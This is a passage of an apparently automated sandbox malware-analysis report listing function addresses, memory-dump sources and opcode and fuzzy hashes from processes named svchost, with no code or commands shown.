                                                      • Instruction ID: 810cf8f0a9245083c3f2b05a092a81aca5b0ab153e8f0daa45528f40eeabfd55
                                                      • Opcode Fuzzy Hash: a377fb05b968ae31067c65060e1f0293e40fa90b3040b2e75a01dea07a9489e8
                                                      • Instruction Fuzzy Hash: 03813566B0AA2EDAD701BF7CF4051E97BA4EF85321B1482F7D849CA187CD246487C7E0
                                                      Function 00007FFB4AD30A10 Relevance: .3, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1485a55a57479e7b54c0e83d477be2258fa8ce464914f6d725bd2ecfe21c07eb
                                                      • Instruction ID: 8de3bffee9e4306506f4ce07b43a48bf25ce9a2f729365d29f3ab4f9cf1b5330
                                                      • Opcode Fuzzy Hash: 1485a55a57479e7b54c0e83d477be2258fa8ce464914f6d725bd2ecfe21c07eb
                                                      • Instruction Fuzzy Hash: 61813566B0AA2EDAD701BF7CF4051E97BA4EF85321B1482F7D849CA187CD246447C7E0
                                                      Function 00007FFB4AD30A48 Relevance: .3, Instructions: 270COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 083c6c4c772c4eb911f99702caa932f31d8f1aeb8962628aaebbf26381931cc4
                                                      • Instruction ID: 74e6a0f1a349edbdbeddc2158772ca3c39658e79abf6c61aa38a3eff62130d50
                                                      • Opcode Fuzzy Hash: 083c6c4c772c4eb911f99702caa932f31d8f1aeb8962628aaebbf26381931cc4
                                                      • Instruction Fuzzy Hash: 62714566B0AA2EDAD701BF7CE4051EC7BA5EF85321B1482F6D849DB187CD246487C7E0
                                                      Function 00007FFB4AD30638 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd77a4103de4c59f6b99efa690701109344a78f9c695551220d4b0bc938b7e0a
                                                      • Instruction ID: 669668c044fc997f8f2de7fb14970484d29387a3e046c367f56f737a3c84d349
                                                      • Opcode Fuzzy Hash: cd77a4103de4c59f6b99efa690701109344a78f9c695551220d4b0bc938b7e0a
                                                      • Instruction Fuzzy Hash: CF31D361B1DA4C0FE789FB3C945A379A6D6EB98315F1402FEE44EC3293DD289C428345
                                                      Function 00007FFB4AD30D21 Relevance: .1, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction ID: da63c2760dcf6d934bab0c861511e9abe13f28c5d98e1fed9a16499a9ad077f0
                                                      • Opcode Fuzzy Hash: fd90a5e10fb1264608242e6a8cb47c4d492fb05fb9e21d9ec28b19b4dd492103
                                                      • Instruction Fuzzy Hash: 4231D391B19A099BE745BBBC981A3BD76D6EF98700F1402F6E40DD3582DD28AD018791
                                                      Function 00007FFB4AD30BD3 Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fcfe8f2e7d8c1635eab19bf9d6332a05f45702e3beedcc4427f8e9980c314fc5
                                                      • Instruction ID: 86512f8a3ec9d53fea69a0abb0390d43e16e3c0895e2b0616d38d89ce0f98755
                                                      • Opcode Fuzzy Hash: fcfe8f2e7d8c1635eab19bf9d6332a05f45702e3beedcc4427f8e9980c314fc5
                                                      • Instruction Fuzzy Hash: 0241DEA0A1DA0E8FEB45FF78D4692ACBBA2FF88301F6405B5D008D3286CE386945C750
                                                      Function 00007FFB4AD30858 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6366e26caf4e7ca915855d9b47bca92970e3e261310015474e7b827702606523
                                                      • Instruction ID: a48b1ccb7317c88cf00180c2c633700e707ff0df5cca85048b32bd119eaf40f5
                                                      • Opcode Fuzzy Hash: 6366e26caf4e7ca915855d9b47bca92970e3e261310015474e7b827702606523
                                                      • Instruction Fuzzy Hash: 6431C1A1A4AA4DAFD342FF3CD0B91A87FB1EF84200B8484E5D808C738BCE345941C761
                                                      Function 00007FFB4AD30870 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2d0f355ec84b1c78a4c16b9d0b057952ac8d1e7fd8053cb77173471d747b480f
                                                      • Instruction ID: b80b4fe2c63792102bf3153efcb76e800d4e949bf00817f2183ef0ba89bd777d
                                                      • Opcode Fuzzy Hash: 2d0f355ec84b1c78a4c16b9d0b057952ac8d1e7fd8053cb77173471d747b480f
                                                      • Instruction Fuzzy Hash: AA21B1A1A4AA4DAFD352FF3CC0B91A97F71BFC8200B8484E5D808C738ACE745A41C761
                                                      Function 00007FFB4AD322C1 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2387940501.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 937bbc79196270e2b79d4dba810e5744654ba698bd3960f41c71147de8c83839
                                                      • Instruction ID: c36ea4825a99ab4ab8c279f7c4e8cf0e175d796352502c7f5e7e2d6f86f76219
                                                      • Opcode Fuzzy Hash: 937bbc79196270e2b79d4dba810e5744654ba698bd3960f41c71147de8c83839
                                                      • Instruction Fuzzy Hash: 5B014995E0EBC50FE786BF389D654317FE0DFA1241B1804FAE8C8CA197DC08AA858342

                                                      Executed Functions

                                                      Function 00007FFB4AD1172B Relevance: .7, Instructions: 689COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe605036c0c7bf7d99a32cc4794dc8f7c4aaf895c3ca9ed962c38bca4237abe8
                                                      • Instruction ID: 2e4287723d97932d71a5e24ded053291db1bf28973ce1c4d44f7dd3ee4396595
                                                      • Opcode Fuzzy Hash: fe605036c0c7bf7d99a32cc4794dc8f7c4aaf895c3ca9ed962c38bca4237abe8
                                                      • Instruction Fuzzy Hash: 7F22D5B0B2DA5A5FE795FF38C4692B97AD6EF98310F5404B9E40EC3287DD28AC418741
                                                      Function 00007FFB4AD10AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9O_^
                                                      • API String ID: 0-1716625314
                                                      • Opcode ID: 5996996030ad07e816b455f668f4024007dcd5aa295d7b908b2abd153a9dd834
                                                      • Instruction ID: 224975c299106e412f71b910d57d88db3dda07b5c844e043fc6ba5bae05e504e
                                                      • Opcode Fuzzy Hash: 5996996030ad07e816b455f668f4024007dcd5aa295d7b908b2abd153a9dd834
                                                      • Instruction Fuzzy Hash: 4A6129B5B0D62ADAE741BF7CE0451FC3BA9EF84325B1481B6D80DD6187CD28688787B0
                                                      Function 00007FFB4AD10EB8 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4O_^
                                                      • API String ID: 0-2486912895
                                                      • Opcode ID: d4f60e89a7485702303978703ce0220b15acec08bcc11ad902aa77a18656780b
                                                      • Instruction ID: 11904205c8bbcca2116ffae55c91ec54927c6a8f6257b7c6448053286aa14157
                                                      • Opcode Fuzzy Hash: d4f60e89a7485702303978703ce0220b15acec08bcc11ad902aa77a18656780b
                                                      • Instruction Fuzzy Hash: 7E416BB1B1DA5A4FE396BA3CD4562B93BD6DF85221B0840FBE48DC7293DC189C438391
                                                      Function 00007FFB4AD107D3 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <O_^
                                                      • API String ID: 0-1368354704
                                                      • Opcode ID: cc1c080c9b5fb599632556d93f0a4663a51711ba117e56b76617dfb013cfab7b
                                                      • Instruction ID: a175dd33a378b50bea5287f9cb867d4439b0a11f132658f87fc0bf29f3f1331b
                                                      • Opcode Fuzzy Hash: cc1c080c9b5fb599632556d93f0a4663a51711ba117e56b76617dfb013cfab7b
                                                      • Instruction Fuzzy Hash: 1E412675A0E759DFD382FF7CD0641E87BA8EF84214B5480F6D849CB29BCD285C868760
                                                      Function 00007FFB4AD10985 Relevance: .3, Instructions: 346COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3f8fed0f94dc21e6593baf557cd19c2dabf3d804511b816ee59995e25976f1e
                                                      • Instruction ID: 81d03ac4bc76385297009edd377bbd106019b23d244aab899adaa7af9d3fe105
                                                      • Opcode Fuzzy Hash: b3f8fed0f94dc21e6593baf557cd19c2dabf3d804511b816ee59995e25976f1e
                                                      • Instruction Fuzzy Hash: DAA1767AB0CA26DAD701BF7CE4452E87BA4EFC0335B1480B7C549CB187C924688B87E0
                                                      Function 00007FFB4AD109D3 Relevance: .3, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43c5cdab61e8fe1d06da629b838b002a58584c51e4792879137e077dcba60deb
                                                      • Instruction ID: 855ce794f6b398d50bcaa1410c2388442976c273cb7a75e2004ae42455eff63e
                                                      • Opcode Fuzzy Hash: 43c5cdab61e8fe1d06da629b838b002a58584c51e4792879137e077dcba60deb
                                                      • Instruction Fuzzy Hash: 2691596AB08A26DAD701BF7DF4052E97BA4EFC4335B1485B7C549CB187C924688B87F0
                                                      Function 00007FFB4AD10A08 Relevance: .3, Instructions: 305COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b9abf86a7aa8bd48fb1744312b7d66f20c58001ed8732b42e3f7b67ecfb9f0fe
                                                      • Instruction ID: 962cbf0af255219a2654a64d6ed3f26dd34593614c8fd1a1ac80893767a63ea0
                                                      • Opcode Fuzzy Hash: b9abf86a7aa8bd48fb1744312b7d66f20c58001ed8732b42e3f7b67ecfb9f0fe
                                                      • Instruction Fuzzy Hash: 77817A7AB08A26DAD701BF7CF4052E97BA5EFC4335B1485B7C549CB187C924688B87E0
                                                      Function 00007FFB4AD10A10 Relevance: .3, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ea5ee38c91275db689431f34df340a30beffc58a62fcfef4cdd1108f3bb83d0
                                                      • Instruction ID: aefdc0abc36bab4ee6d217be44f169ef76f54b2c5f1c0c0093d2e6dda998f6a7
                                                      • Opcode Fuzzy Hash: 9ea5ee38c91275db689431f34df340a30beffc58a62fcfef4cdd1108f3bb83d0
                                                      • Instruction Fuzzy Hash: 6F81587AB08A26DAD701BF7CF4052E97BA5EFC4335B1485B7C549CB187C924688B87E0
                                                      Function 00007FFB4AD10A48 Relevance: .3, Instructions: 270COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b30fd4e749b72a696c2b3c9ce4d6ae322f8d916af71e6a57374b43bdf2155a98
                                                      • Instruction ID: 34251dc20e347ef7fd1b617ca8d0518f91c736bd5219edf8ec96ceabe5380841
                                                      • Opcode Fuzzy Hash: b30fd4e749b72a696c2b3c9ce4d6ae322f8d916af71e6a57374b43bdf2155a98
                                                      • Instruction Fuzzy Hash: BF717A7AB08A26DAD701BF7CE4052E97BA5EFC4335B1481B7C549DB187C924688BC7E0
                                                      Function 00007FFB4AD10778 Relevance: .2, Instructions: 162COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9586dede8d6edffdb67bf94edd97ceb734578965c7705a6066f37498fd2357e1
                                                      • Instruction ID: 86bff3afd3a693d23c6fe4829bc11584a43d5dce1d0eac2246a7fb7484708736
                                                      • Opcode Fuzzy Hash: 9586dede8d6edffdb67bf94edd97ceb734578965c7705a6066f37498fd2357e1
                                                      • Instruction Fuzzy Hash: E8515DA1A0E7599FE342FF7CD4641E47FA8EF8121475480F6D489CB28BDC285C468761
                                                      Function 00007FFB4AD12188 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66a7629014123c88f0fd4fb5ec3a64468958a0db85f4ea8c35073c7cf985539b
                                                      • Instruction ID: 61ad61ed8c454f3a78001dd895f0cbf8dc84b5492d9462c2b6d6619f537835c4
                                                      • Opcode Fuzzy Hash: 66a7629014123c88f0fd4fb5ec3a64468958a0db85f4ea8c35073c7cf985539b
                                                      • Instruction Fuzzy Hash: B431D061B1CA490FE789FB7C945A378AAC6EBD8315F0401BEA84EC7293DD289C468345
                                                      Function 00007FFB4AD10638 Relevance: .1, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ac343d6694b71238e6b3f2e4647fd769ca6524441fece32fcea2b748365f776
                                                      • Instruction ID: 9c3c1dd3ce7b1cc123d55c9e4ad24930d1e8d4c2e593b6688a767fdbddc611ad
                                                      • Opcode Fuzzy Hash: 8ac343d6694b71238e6b3f2e4647fd769ca6524441fece32fcea2b748365f776
                                                      • Instruction Fuzzy Hash: C531C061B1CA480FE789FA3C945A379AAC6EBD8315F1401BEA44EC7293DD289C468345
                                                      Function 00007FFB4AD10BD7 Relevance: .1, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34705338b4023dc85b0066ad58379efdd52cd2b8483774978268e944d96f1f86
                                                      • Instruction ID: b4904d15e70a5c9239203da8b097bbb14a33f119f94df53b520d67d0be708bbd
                                                      • Opcode Fuzzy Hash: 34705338b4023dc85b0066ad58379efdd52cd2b8483774978268e944d96f1f86
                                                      • Instruction Fuzzy Hash: B24103B0A0DA1ADFE745FF78D4552FC7BB6EF88214B6440B5D409D728BCD28A84687A0
                                                      Function 00007FFB4AD10D26 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6f6c52642b8698453c163e52fd06f11cfc2a9b8df8eae2455f377f9bfc30756
                                                      • Instruction ID: 108022121086432e5341fc45c993b12a0c6c85b0844fe90b0e8f58f70f9b0e6e
                                                      • Opcode Fuzzy Hash: a6f6c52642b8698453c163e52fd06f11cfc2a9b8df8eae2455f377f9bfc30756
                                                      • Instruction Fuzzy Hash: DF3128A1B1CE4A5FF745BFBC981A3BC66D6EF98301F1401BAE40DD3686DC18AC458391
                                                      Function 00007FFB4AD10BEB Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 904fb1549b491116ae9f9a6e8f7b883701703a59c1f12cc9876e19ea0a871ee1
                                                      • Instruction ID: 9c3cdd9790dd087ccaf4735cb6a87657a5fb250c09b7fa2bd5083d67302bba3c
                                                      • Opcode Fuzzy Hash: 904fb1549b491116ae9f9a6e8f7b883701703a59c1f12cc9876e19ea0a871ee1
                                                      • Instruction Fuzzy Hash: 25319570A18A1D9FEB85FFB8C4696FD7BA6FF98310F604474D009D3286CD38A9458750
                                                      Function 00007FFB4AD10870 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7d8ffcf82806f3e59121f7b35ba20fbd53e1b1d7b08fac7b0696e4beb4cd776
                                                      • Instruction ID: c3e2d10065b09411f8c0c1e7bcfc288fc860717bc4f2d25b18b8bc1733437abe
                                                      • Opcode Fuzzy Hash: b7d8ffcf82806f3e59121f7b35ba20fbd53e1b1d7b08fac7b0696e4beb4cd776
                                                      • Instruction Fuzzy Hash: DE21806060AA4DDFD396FF38C0A85A9BF79EF98214B9080E5D809C339ECD3859518761
                                                      Function 00007FFB4AD122C1 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50a4efc618dcb2c90948893c8be204367b5d8197fdf750c59a2d46bb39014426
                                                      • Instruction ID: c8353049849ea4b12a77b1ad1ef0e1396f8f0f89d8170867abff96234d64c785
                                                      • Opcode Fuzzy Hash: 50a4efc618dcb2c90948893c8be204367b5d8197fdf750c59a2d46bb39014426
                                                      • Instruction Fuzzy Hash: 480149A4A0DBC54FE785BF3889554397FE4DF91200B1804FAE8C8CA1D7DC1C59818342
                                                      Function 00007FFB4AD1160B Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.2466764749.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_7ffb4ad10000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d148eb9c642e2d96bae02a2f18492eec54a54987eacf641cc90b7b3abffd411
                                                      • Instruction ID: 0a086d7a6830b3f3263acf6ae6adb029212d2c392b0fede2c42dabb9db1b6ad7
                                                      • Opcode Fuzzy Hash: 1d148eb9c642e2d96bae02a2f18492eec54a54987eacf641cc90b7b3abffd411
                                                      • Instruction Fuzzy Hash: A3F059B3A1CD4E0BE780BEB8C8141FD7BA2FBC8300F8405B8E059D21C2DD2818004380

                                                      Executed Functions

                                                      Function 00007FFB4AD01719 Relevance: .7, Instructions: 695COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e71cc2d359b5d52731ba5c6d187c025cad34b289451aa7dcc4c9da4a8b96bd83
                                                      • Instruction ID: 8b5c70085d8ff55f94053e7cbe238636f386f32b5b41a2eac0960a51f31ea34d
                                                      • Opcode Fuzzy Hash: e71cc2d359b5d52731ba5c6d187c025cad34b289451aa7dcc4c9da4a8b96bd83
                                                      • Instruction Fuzzy Hash: 1522F4A0B1DA4D9FE799FF38C4592B976D6FF98308F5404B9E44ED3686CE28AC018741
                                                      Function 00007FFB4AD020F1 Relevance: .2, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5219338a94ef029a33d577ef2dd3025cee3a59668b1e30eefdb93b565437e7c
                                                      • Instruction ID: b61de4aa6da4e989070d5e548d05d279e9300cac16ca7d79c3d1503046c60549
                                                      • Opcode Fuzzy Hash: b5219338a94ef029a33d577ef2dd3025cee3a59668b1e30eefdb93b565437e7c
                                                      • Instruction Fuzzy Hash: FC5100A0B1E6C95FD787AF7888652767FE8DF97219B1800FBE0C9CA193DD085846C346
                                                      Function 00007FFB4AD00AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9P_^
                                                      • API String ID: 0-1898675183
                                                      • Opcode ID: f814526dee190cead69d786d24ccd39e19ec567f92ed0efcdbcaf1e2a8a05c06
                                                      • Instruction ID: d7dbbe35b7dad90bc1bf70e5f9bb046e24219d60ae15c9b5ba343fa9919f9faa
                                                      • Opcode Fuzzy Hash: f814526dee190cead69d786d24ccd39e19ec567f92ed0efcdbcaf1e2a8a05c06
                                                      • Instruction Fuzzy Hash: 24615BA5A0D61AEFE341BFBCE4415ED37A9EF84328B1485B6D44DD7187CD28684783B0
                                                      Function 00007FFB4AD00E8E Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2554041409.00007FFB4AD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_7ffb4ad00000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4P_^
                                                      • API String ID: 0-2202116914
                                                      • Opcode ID: a804fdb3dfa76e81578a360f36543fde9e53a6f57fc429cb17430f5d78da10b1
                                                      • Instruction ID: 3b50cdf2051ee412535fc74209f81932d18d22c5b124e8926675c5023c82afca
                                                      • Opcode Fuzzy Hash: a804fdb3dfa76e81578a360f36543fde9e53a6f57fc429cb17430f5d78da10b1
                                                      • Instruction Fuzzy Hash: E351F761A0EA8A1FE397BB7898561B53FE5DF8622470940FBE48DC7193DC189C478361
                                                      Function 00007FFB4AD01295 Relevance: .9, Instructions: 856COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
